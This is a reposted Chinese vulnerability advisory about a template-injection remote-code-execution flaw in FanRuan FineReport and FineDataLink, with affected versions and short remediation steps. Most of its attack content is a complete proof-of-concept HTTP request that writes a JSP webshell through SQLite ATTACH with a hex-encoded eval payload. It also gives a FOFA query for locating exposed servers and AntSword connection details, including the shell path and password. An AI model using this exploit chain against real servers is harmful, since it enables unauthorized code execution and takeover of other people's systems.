最新帆软工具RCE漏洞POC

admin 2024年7月26日18:50:28评论294 views字数 1500阅读5分0秒阅读模式

漏洞描述:

帆软 /webroot/decision/view/ReportServer接口存在SSTI模板注入漏洞,攻击者通过构造特殊 uri 请求参数注入到模板中,最终可执行任意代码控制服务器

空间语法:

fofa:app="帆软-FineReport

攻击效果:

【漏洞通报】最新帆软工具RCE漏洞POC

影响版本:

  • 帆软FineReport V10V11(最新版)FineDataLink 4.1.10.3 及以下版本

    漏洞修复:
    1、删除 sqlite 驱动:请从工程的 webappswebrootWEB-INFlib 目录中删除sqlite-jdbc-x.x.x.xjar驱动文件,并重启工程以完成更改。

    2、调整配置文件:在url.properties文件中,请添加以下规则:rule3=/view/ReportServer、rule4=/view/ReportServer/。
    3、安装 web 应用防火墙插件:请安装并配置相应的最新版 Web 应用防火墙插件。

    POC

    GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Ftesttest.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
    host: xxxx
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br

    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    蚁剑连接地址:http://地址/webroot/testtest.jsp?a=javax.script.ScriptEngineManager
    蚁剑连接密码:b
    连接类型选择:JSPJS

    原文始发于微信公众号(光剑安全):【漏洞通报】最新帆软工具RCE漏洞POC

    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
    • 左青龙
    • 微信扫一扫
    • weinxin
    • 右白虎
    • 微信扫一扫
    • weinxin
    admin
    • 本文由 发表于 2024年7月26日18:50:28
    • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                     最新帆软工具RCE漏洞POChttps://cn-sec.com/archives/3001560.html
                    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

    发表评论

    匿名网友 填写信息